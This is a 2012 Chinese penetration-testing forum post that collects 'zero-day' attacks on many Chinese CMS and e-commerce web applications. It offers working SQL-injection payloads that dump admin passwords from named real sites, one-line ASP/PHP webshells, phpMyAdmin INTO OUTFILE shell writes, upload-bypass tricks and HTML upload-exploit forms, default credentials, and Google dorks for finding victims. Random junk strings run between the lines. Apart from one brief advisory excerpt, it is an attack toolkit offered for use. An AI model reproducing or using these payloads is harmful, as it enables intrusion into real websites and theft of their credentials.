中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
' x) Y* m# J. G$ [5 q6 B
" l- O4 z0 s9 n+ ~
直接上exploit:
7 v- w; Q, S Y, j6 _, g- d: G
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
9 `$ \2 R" U7 S, r( o$ Y2 h! b' W
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
) O: ~1 G" x* r ~0 |- X- i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 f4 \1 g; C4 G+ R/ L5 X+ a$ {! q4 t
Asprain论坛 注册用户 上传图片就可拿到webshell
5 d3 b+ j( {: ]# A; }! A
- U2 {% Q- a' i/ d0 ~, b
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
0 T9 b! n7 B: L0 i2 m, R
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
( a+ n/ ?: f- |6 I: E5 r" m
2.gif 为一小图片文件,一定要小,比如qq表情图片
6 H2 N" i7 ~3 A4 L* I1 I2 Z
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
( Q$ c* n5 F+ X0 [
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
5 ?2 L; Y p. Q5 T, S
5.q.asp;.gif
! J5 C0 A& |6 I0 P: d! O
google:Powered by Asprain
, l( p. ^! n. F& |- f' u$ M
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 }; ]) p* I" p6 W O
/ C- }6 c5 D% P& l# M4 A
ShopNum1全部系统存在上传漏洞。
- o" j. E# h) X8 t p
. ]9 d' j) R- D8 D x. e
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
% B0 V+ U* X6 F0 c( e6 }3 _
按说明 提示登录后台。。
1 E, Y7 E( E: g, B' i4 h8 l3 ?
在后台功能页面->附件管理->附件列表
" A; T: n5 D" N
可以直接上传.aspx 后缀木马
# B. f1 y1 k2 x! F( E: K# B
http://demo.shopnum1.com/upload/20110720083822500.aspx
& s- M: v W7 B4 }% A( @; J
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 J# e- H& m' c% n5 H# K
( A+ m+ ?* q& W/ c
牛牛CMS中小企业网站管理系统 上传漏洞
6 H1 Q9 t: y& y5 i; M W% X
* H! d3 e+ T+ J n! \$ B- S7 _
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
( P# h( v& Z/ r# E/ G4 |2 \5 `
后台:admin/login.asp
% e4 r/ R% Q/ W: N' e1 P( A. x# C
ewebeditor 5.5 Nday
1 r% r P2 W% A% }; @6 Y& J. d
exp:
' V+ n! n, \' S, W
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
K- L: v6 J* ?
<input?type=file?name=uploadfile?size=100><br><br>?
, w& v( E$ u! K$ ~+ B5 u d% ]
<input?type=submit?value=upload>?
3 r, H) C5 P1 \6 k
</form>
* A( Y' c! s. f, j5 q! ]
ps:先上传小马.
/ i' |( l0 Q+ D2 P+ m$ }4 A0 h
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
0 y# D7 ?6 X% r" w+ M8 p, I7 b u; e
# u6 k: E. i# z6 T4 ]0 C/ i! s+ b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
G( F% T- v3 Y
% ]' O! a2 s( A5 H
YothCMS 遍历目录漏洞
, V. a* ^$ y' T! s& _% C! f
3 g3 d: W9 F- o! n% _4 s
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
x5 q, U4 C+ \: u
默认后台:admin/login.asp
' E1 }7 C0 e h: c6 K/ l$ {) w
遍历目录:
) Z. l& Z# Y# d* b' S3 W
ewebeditor/manage/upload.asp?id=1&dir=../
* e" v1 }" E! i [( a
data:
; b6 g1 U* M( N; z. C! y! s( W6 {
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
2 R4 E/ r+ \; x9 w4 d
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 Q4 x ~1 v! h+ T) D: @- V* k
) z* G. W4 D! v1 S
Net112企业建站系统 1.0
# _" [6 A% B* q8 k
8 g) {8 A6 h' Y# O" m8 X
源码简介:
. m) Y7 a; f; G# V
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
" Y; }) |! O, M$ \. \7 `
添加管理员:
3 Y& o" K. T$ a/ m; o: B5 L
http://www.0855.tv/admin/admin.asp?action=add&level=2
- w4 \$ D0 q/ M7 a6 ^, w6 L
其实加不加都不是很重要,后台文件都没怎么作验证。
. P b0 b9 s" u5 R
上传路径:
6 k) v' }# e: D; `* D
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
& U/ }' S: E2 z; `/ D! }
http://www.0855.tv/inc/Upfile.asp?Stype=2
- Q4 [. C2 |/ B# L; a" T
怎么利用自己研究。
$ a4 |2 u, t* t5 G, Z
遍历目录:
/ N% Z) d% |" ^: O6 X1 T, V
http://www.0855.tv/admin/upfile.asp?path=../..
3 X% u+ ?8 R7 {( ~
如:
7 W/ C& L; G2 }$ k1 f1 @. R0 G8 U
http://www.0855.tv/admin/upfile.asp?path=../admin
( X$ T4 T6 S' ?- s# R% Z
http://www.0855.tv/admin/upfile.asp?path=../data
+ C6 c2 Z8 N4 e# p0 @6 @
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! e( ~2 w- `; w% y1 a( a
8 `% k: M! M8 w+ D
易和阳光购物商城通杀 上传漏洞
9 m' C! W1 T/ Z
* T7 W/ \( l0 P6 Q7 ~
前提要求是IIS6.0+asp坏境。
- U' p2 ^* O. u, m, y" ~
漏洞文件Iheeo_upfile.asp
7 E: ?: R: l+ i3 ]' w! L
过滤不严.直接可以iis6.0上传
: j9 H6 E5 S7 B2 y
把ASP木马改成0855.asp;1.gif
: }: S7 N \( M; e Y B
直接放到明小子上传
" ]* j% N" O# n/ ?) ?
Google搜索:inurl:product.asp?Iheeoid=
1 ~" r' j% N2 Y8 C5 q* c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! Q B3 Q2 W1 H
0 X0 \2 y" d( ?) p% J4 B
phpmyadmin后台4种拿shell方法
) l: v _4 ]3 ^, n+ u8 Z
% K5 ^2 ]: g6 |( }) Q
方法一:
& i) ?/ z6 u5 f( @8 U" |/ a2 X' }' \
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
" Y' b% d" T5 |! u3 G! h# s3 G% ?
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
" n+ T3 n$ k5 q& s3 s/ ~: _$ ~
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
! N2 U( F- B% e" g0 G
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
4 X6 C: e p' }
一句话连接密码:xiaoma
5 l) F8 E% z# U) N& |+ y3 t
方法二:
6 \; q' h% c# d6 v: q: P4 F
Create TABLE xiaoma (xiaoma1 text NOT NULL);
+ Z3 X7 I/ T; r% f$ ^! K; \
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
" h' J: N2 M N+ L: W% d
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
& g/ i* s* U3 D. D
Drop TABLE IF EXISTS xiaoma;
& _6 H6 w! u# g: x- ?
方法三:
2 Y; Y% P; f7 N: h/ G$ ^
读取文件内容: select load_file('E:/xamp/www/s.php');
R$ a- e) ?4 d: A
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
6 \9 y% Y1 ^$ _' K% K
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
& K0 E+ P$ i" t! P( v
方法四:
7 T( X1 l9 e* R- O% S
select load_file('E:/xamp/www/xiaoma.php');
# X6 t6 u7 @ }: G+ V, w
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
. E/ c1 M7 L1 V8 j
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
! ?% k: a" Z( L( b) A
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( S9 q( @+ f) W) F' [
6 J# V7 p4 R/ l2 w- f/ Q
传信网络独立开发网站源码0day漏洞
1 j) H+ p, p* M7 u- ?; G, J& x
- ~/ V# H9 P, K' W. R, S' M
后台system/login.asp
; S4 z9 Y$ e* R3 n) }
进了后台有个ewebeditor
9 h# P1 c1 l* p& {5 l
Google 搜索inurl:product1.asp?tyc=
" a* ]6 ]9 i0 X: |- e/ |. X
编辑器漏洞默认后台ubbcode/admin_login.asp
$ j8 [# p5 n; L3 |4 w
数据库ubbcode/db/ewebeditor.mdb
! K" J: `6 ~9 i* @: K2 T
默认账号密码yzm 111111
3 A5 h, v$ g- W
( a A2 ~9 a4 }
拿webshell方法
' {6 B& ?. G; O2 K8 n% e" M0 h5 Z
登陆后台点击“样式管理”-选择新增样式
" k; S j& V' `7 X
样式名称:scriptkiddies 随便写
7 W# H8 |9 G( d; c& s
路径模式:选择绝对路径
( l7 ], k. n$ t; h8 W. z3 l; q2 a9 p) Z
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
6 @5 q. Q& F# N1 [, _" f) u
图片类型比如就是我们要上传的ASP木马格式
; n4 I- ~7 b0 q7 \- M7 A- I+ S
上传路径:/
$ s' w3 q6 Q' e
图片限制:写上1000 免的上不了我们的asp木马
, ~( E6 q Q7 g
上传内容不要写
3 j3 `6 [: [7 L! y% `+ `7 Y4 X' I
可以提交了
9 X/ n1 |3 u; C: G' s4 b' d% c
样式增加成功!
$ H* d# I+ g! |3 x. |. n
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
) C h) ^, N7 u' {1 z
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
& v+ g: [5 [% k% c" Y
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
. P. d% x' J% r/ {4 G- |
上ASP木马 回车 等到路径
) _. K% A6 z. W9 |; v% _
3 ?1 J9 o/ P! e+ K6 G3 n
后台:system/login.asp
( p1 S& d0 B1 c# c% t
Exp:
, B) s$ A. h4 D* Z
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
$ C5 }3 d' ]: O; o, G- A! d3 X9 u5 Z& C
测试:
) j1 e9 ]+ g" c) B- U
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
, \* D: _) f$ L0 Z5 q7 U9 m. Y! o
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
$ w7 \' u4 e- f
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, h* j# |1 V) b6 e
7 t% x4 n* d% A) V
foosun 0day 最新注入漏洞
" c# k! q; h: |: }4 m# E9 G
9 {2 K. A- j# r) s* |3 p
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
. n) a$ d! T! i( m4 ?
利用简单的方法:
" Y/ L( |2 }8 ^2 ]0 Z# H# t7 R
暴管理员帐号:
/ {. s8 s7 F% R/ P
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
: s' i+ _7 W# V* y
暴管理员密码:
% J% j0 a' y' Z! _5 ?
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
! J/ j* E3 |" ~/ e
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 }$ u1 a$ U4 V' M
- F3 B* m$ N( h4 e6 u; H$ Y) w
网站程序的版权未知!
: B: W7 d4 w4 _/ @& o O
8 E6 I* H" {$ C0 o4 J- x6 |$ ?
默认网站数据库:
% O" p! J! K* e- ?, G& R( c
www.i0day.com/data/nxnews.mdb
4 V. S8 \/ }/ j/ u- X" c! n! A
ewebeditor 在线编辑器:
1 l" s4 T, p' x& v3 U1 U
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
4 Q3 c: @) k V3 a8 \0 S9 [( a
登录地址:ewebeditor/admin_login.asp
/ B3 m7 h3 ~' k) [* u9 k9 T! i9 H3 l
默认密码:admin admin
1 e$ ]5 C7 y+ W; e0 B M2 y
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
6 `$ y# `" C9 ?- [, l* A
. E6 w) d+ T3 E+ w
Sql注入漏洞:
4 h/ w$ r! {! M% o/ o0 N
http://www.i0day.com/detail.asp?id=12
3 B* Q1 a$ b2 Q; Y
exp:
- y/ o" T2 U4 D, T
union select 1,admin,password,4,5,6,7,8 from admin
2 V V7 |0 Y- H5 Q
爆出明文帐号/密码
6 d( s' w# h$ Z! ]
( @. @; U# } S' r
上传漏洞:
N7 n; P. z+ |0 r. \9 `
后台+upfile.asp
. F0 j T7 g, a( o5 \, w; ^: Z2 m
如:
5 T7 d5 c) c9 m$ h
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
# V! A! u q/ p" _
shell的地址:网址+后台+成功上传的马
/ |9 U4 B% _ W: |* l# N
google:inurl:news.asp?lanmuName=
! T3 F$ Q: w# Q) U {
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 g+ a9 o7 S+ F; L5 i6 y
( x9 ^, h% A' V" N3 o8 t: G
dedecms最新0day利用不进后台直接拿WEBSHELL
. E" D$ y/ o+ C# d& j9 F& ]0 I2 K
2 }! r' ]6 p: i) {; v- l
拿webshell的方法如下:
; z2 Z5 M- g" V
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
- C2 B& U4 ~- `- a
前题条件,必须准备好自己的dede数据库,然后插入数据:
3 w) d$ y. B$ w) J6 o
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
9 u5 t; \0 y( x8 ~ N. w1 \
: s$ x1 }/ }$ L1 O/ S
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
; \( W- [* z! s! j. t( F
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
) r U; n1 |) ~/ D
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
: {* S. S/ B+ y+ z& _
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
3 `/ S4 W4 z) o; \
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
4 u8 w4 |/ t+ R0 s; f% H# S- U
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
6 Z# m; L, I0 S0 T! e
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
! |5 e8 ]2 q& ^1 m0 v- E
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
$ e1 a) L: `& p9 a$ I/ B
<input type="text" value="true" name="nocache" style="width:400">
: Y8 ?; D2 j6 M
<input type="submit" value="提交" name="QuickSearchBtn"><br />
/ v4 }, |8 S D$ X6 l
</form>
* D( U& x2 \7 a- V6 _$ G! v
<script>
# L- S# m) U( h, R9 Q" S
function addaction()
3 o7 `2 ^" S) t5 u) ]
{
3 c2 T* x! x7 i+ P4 |# \
document.QuickSearch.action=document.QuickSearch.doaction.value;
! L3 M. X5 ^/ O( A G% c) _. t
}
: ]/ N$ r) |6 W; P
</script>
) V, E' ?7 [+ t+ i& |7 s2 G
-----------------------------------------------------------------------------------------------------------------------------------------------
9 E6 @8 Y/ p2 G
- i. m5 [2 W6 J# t# B- u: S
dedecms织梦暴最新严重0day漏洞
R. q3 Q' o. b" |* \- P
bug被利用步骤如下:
! ]6 C4 Y( ?! p# Q, }
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
3 h" h- | d$ w5 x! E' B& b
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
% g/ f: m! g9 h3 |* M! P7 m
-------------------------------------------------------------------------------------------------------------------------------------------
; o+ X8 `4 }; ]) D$ d0 D
. u3 [3 n( b9 K9 f9 K1 S/ @% q2 l# @( c) [
多多淘宝客程序上传漏洞
: x1 D) L5 c' m5 t. j- [
漏洞页面:
6 N) \1 k! L( L+ ~9 q
admin\upload_pic.php
! b F3 L/ V" T6 W. }5 j
传送门:
; \5 ]$ o6 i \% L4 o
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
3 V8 V' Y4 X& D4 U Y$ K: `7 k/ R
PS:copy张图片马 直接 xxx.php 上传抓包地址!
/ I& u" x/ y1 d0 {0 |: r5 g, X
------------------------------------------------------------------------------------------------------------------------------------------------------
2 }$ c$ g9 u8 [1 R/ E
( C. Z; D9 K) @" e- U$ y
无忧公司系统ASP专业版后台上传漏洞
+ k, q* |3 L1 _( X5 c9 Q
漏洞文件 后台上传
$ q9 \) G8 ^; I% t0 X/ g
admin/uploadPic.asp
& _$ v* a7 V" @* _4 d S( ?; n w
漏洞利用 这个漏洞好像是雷池的
5 P4 v6 s+ S$ G" D/ \
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
: |! o+ a0 G3 C& z$ I* m% o9 y
等到的webshell路径:
: n. i4 E" _( h* F, c6 _/ Y
/UploadFiles/scriptkiddies.asp;_2.gif
- L7 y- s+ E! R, J
---------------------------------------------------------------------------------------------------------------------------------------------------
' c0 c$ o& [1 L& |
2 Y# H( T' G; Q5 b3 G
住哪酒店分销联盟系统2010
/ y# ~) E" I4 K# }5 q3 u
Search:
/ e0 l* g1 w- N
inurl:index.php?m=hotelinfo
1 I! |" l7 K9 ]1 O
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
4 I1 z, Q! o! d/ T2 q! l1 L
默认后台:index.php?m=admin/login
2 i4 D" V# [ O8 a
--------------------------------------------------------------------------------------------------------------------------------------------------
9 k8 u. k! a) h- n
3 a/ K/ \: b: T
inurl:info_Print.asp?ArticleID=
" |( Q0 q* U& Q( S4 \- Z
后台 ad_login.asp
3 R8 ? ^6 ^: n9 q* n, L J
爆管理员密码:
& S0 y8 z! [' s9 | |3 \
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
( a. ~+ S" e) h
------------------------------------------------------------------------------------------------------------------------------------------------------------
* R5 ]0 H$ `2 C7 n7 t- G" F
( {; p% d2 e8 B! p/ g* T
搜索框漏洞!
. |! L. ^; i, ^2 Z$ h
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
. ^; L8 k! ~* D
--------------------------------------------------------------------------------------------------------------------------------------------------------
! T9 D5 G& n6 U A' r) }
- e8 f" | J8 r! A5 |8 Y
关键字:
4 d) i1 N& v: t" j+ l
inurl:/reg_TemletSel.asp?step=2
. U- I* ~% P% Q8 v% k. j+ M, M3 F/ X
或者
/ R) L$ Y# N9 V0 j7 M
电子商务自助建站--您理想的助手
6 E4 R5 o# g2 h- z# z
-------------------------------------------------------------------------------------------------------------------------------------------------
, N/ ?, N2 S* ?0 x2 Z; R, M5 d
, A/ H$ I; a1 y! T- M
iGiveTest 2.1.0注入漏洞
7 J+ [5 e( E. ^- j) o/ q# ~
Version: <= 2.1.0
. E3 I9 ^- |3 R1 f w6 p( V% @
# Homepage:
http://iGiveTest.com/
5 p5 r3 P- l4 T0 b2 }
谷歌关键字: “Powered by iGiveTest”
; I% G1 U" l2 A
随便注册一个帐号。然后暴管理员帐号和密码
3 S$ @8 ^( h# l2 ]* C/ G# v- v
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
A* [& b5 z# K) F
------------------------------------------------------------------------------------------------------------------------------------------------
$ n) @; ^& E$ t) ?0 V5 S- G1 @
A& a3 _* Q: K1 m
CKXP网上书店注入漏洞
4 W5 n! p3 q, L/ ]- k
工具加表:shop_admin 加字段:admin
/ S y9 K( U0 f) v+ c4 Z" I5 `- E
后台:admin/login.asp
; l8 v& \7 n+ K8 z3 U' m7 I
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
9 l' Q' @& E& ~( q
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
) s% c, K) k: m* V
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; q$ s3 F0 ~7 f+ h
0 f. e, F3 l4 T$ n/ {2 N2 S8 a
段富超个人网站系统留言本写马漏洞
/ K. h5 I _3 ?& }
源码下载:
http://www.mycodes.net/24/2149.htm
- @; ~% n7 \' [' N0 f
addgbook.asp 提交一句话。
4 d/ {; z! `5 l1 A; ~0 E7 k6 v
连接:
http://www.xxxx.tv/date/date3f.asp
; X, D4 V1 N; K5 z5 e1 x
google:为防批量,特略!
8 I3 ?5 o# | L6 q6 Q# C
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 n) W4 ]% M3 A' l( T' m/ w$ o
: N, b1 E m5 [6 K: U# |, @1 Q7 h
智有道专业旅游系统v1.0 注入及列目录漏洞
+ F0 b8 `1 P* }/ Y- a
默认后台路径:/admin/login.asp
7 U5 ^" V, A, \1 u6 n
默认管理员:admin
2 \* ~' S9 g% m8 v: c
默认密码:123456
: y% C ^4 E( R3 T5 L
SQL EXP Tset:
% S5 }0 c- l; W% J* n7 \2 C
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
- q6 C* r- q1 {
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
g( H" i+ _6 ^% [. @% D% O
2 \! o" o; @9 v& h3 M5 Y, `% J
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
" l8 d- @, \' G v n7 j
EXP:
7 |7 X& O& t" X: X5 i) T3 O8 }, F
<title>eWebeditoR3.8 for php任意文件上EXP</title>
4 G% S9 H* g5 k9 g
<form action="" method=post enctype="multip
8 o8 d: L0 q; @5 a2 r
art/form-data">
4 ^& `, X# a6 V; z# \; X4 T
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
O5 a, S6 i* m3 k9 G7 L' O
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
6 ?) J* y9 `# w% `
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
7 k/ k+ _7 ?. d& M: g/ z0 i
file:<input type=file name="uploadfile"><br>
, d( @' [- K, c& p8 z( z
<input type=button value=submit onclick=fsubmit()>
* z0 t& p$ e8 e. V6 v. P3 X0 |
</form><br>
$ I( E; @+ [- Q9 e7 a- t4 w6 \
<script>
% q( y: P+ A3 x5 u7 J. ]3 I
function fsubmit(){
5 u4 o, L* B C) D- J
form = document.forms[0];
4 M$ ~7 U% @/ N
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
6 p5 `' i: X2 l# d
alert(form.action);
: X8 ~' l+ n5 ^3 x. D% e
form.submit();
6 M2 f. l9 m! `& K# R
}
9 V+ ], ]5 W/ q
</script>
" z1 K9 G G6 N4 B5 P# h& ?
注意修改里面ewebeditor的名称还有路径。
. ~; l) s! B! j5 g$ \) N
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 I# ~/ I0 z7 B1 r4 H
5 h' e! n9 g- K/ k- L9 o! L
提交’时提示ip被记录 防注入系统的利用
* c1 Y; ^9 E! s M( S$ O* x% q
网址:
http://www.xxx.com/newslist.asp?id=122
′
8 t1 K! U( `7 |, l, B
提示“你的操作已被记录!”等信息。
/ }7 X, s% r9 U" D5 A# w! _; F+ q
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
' Y$ @9 `+ b6 M7 s' y
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 n6 C/ ?5 P0 d1 x' F* q+ O7 C
; `9 W0 b3 N/ W* b* x
西部商务网站管理系统 批量拿shell-0day
2 D" P* u0 A# G3 ^# ?4 g6 ?
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
0 m: ?# d/ X: d/ b9 E! N9 F6 o
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
0 e- D# [4 A2 y O+ U5 u
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
; P$ s! p& Y, v8 [2 H% X: T, f2 [
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
: U6 W3 o* ?, ? ], b/ x
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( o2 h( ]: I/ w# N
- w% U$ Y* L3 ~1 }4 D) P
JspRun!6.0 论坛管理后台注入漏洞
/ E; ]; r' b, _6 @% W D
( o2 r$ f" U h7 D* k5 X
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
, ~6 w" d# e& q! B) h
JspRun!6.0
0 W N8 {) P8 E: ^( T1 a8 U- i
漏洞描述:
, \5 O4 f9 U# p1 F
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
! D ?) @) p& R
在处理后台提交的文件中ForumManageAction.java第1940行
" Y5 `( v+ ?% [
String export = request.getParameter("export");//直接获取,没有安全过滤
, u/ Z1 \# l" [0 p2 l; K
if(export!=null){
- R0 U3 C6 A. _# P+ D3 j3 R
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
D {9 X" x* I. N% D$ n, E* U+ T8 N9 R+ ]
if(styles==null||styles.size()==0){
. o" F% H6 m# F- s' u
<*参考
+ Z( M2 r3 J0 M/ T. O. E) |
nuanfan@gmail.com
- ~# m; u2 F- ?% u+ c7 L+ `
*> SEBUG安全建议:
: G6 F% A+ T' L9 `
www.jsprun.net
# _: H+ f# X4 f) O6 J0 {
(1)安全过滤变量export
: k& H3 m7 W1 w, T; W
(2)在查询语句中使用占位符
2 c6 V2 e7 O9 }7 t7 f
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. `# L$ Z6 }, H
$ j! a/ I: j, v, @ I1 ^
乌邦图企业网站系统 cookies 注入
! V3 N s2 H& q# Z: X; |
C6 g% c, l; s! H/ ~1 W: G
程序完整登陆后台:/admin/login.asp
9 J1 f' m! X d9 y6 {
默认登陆帐号:admin 密码:admin888
/ M2 X. i6 o' w+ q4 l
语句:(前面加个空格)
- e# N4 e2 D2 J, @ T0 c
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
8 H; Z8 j5 M0 h3 X
或者是16个字段:
* |! \3 T- w; d2 ]4 Z, x$ Y7 L1 P
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
4 _2 w! s- K% H
爆不出来自己猜字段。
: J) ]$ f, M2 w2 i$ n
注入点:
http://www.untnt.com/shownews.asp?=88
' i- F, x, ~" u4 ?3 I* H
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
# t" {( v5 |4 T" Y: r7 e
关键字:
3 t, M" K5 A7 n* w* n* p
inurl:shownews?asp.id=
2 E; \9 F E4 k9 w
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" b' g$ _' D8 a9 E' {9 T5 H
* |- j5 C+ g' W( B9 A8 o; w" O
CKXP网上书店注入漏洞
4 l [$ t' G J1 v* }
4 L; G: ^, } B. \5 f- L
工具加表:shop_admin 加字段:admin
. x( x, {1 ?. p( q
后台:admin/login.asp
" {6 K2 n/ Q2 i9 v/ N0 B
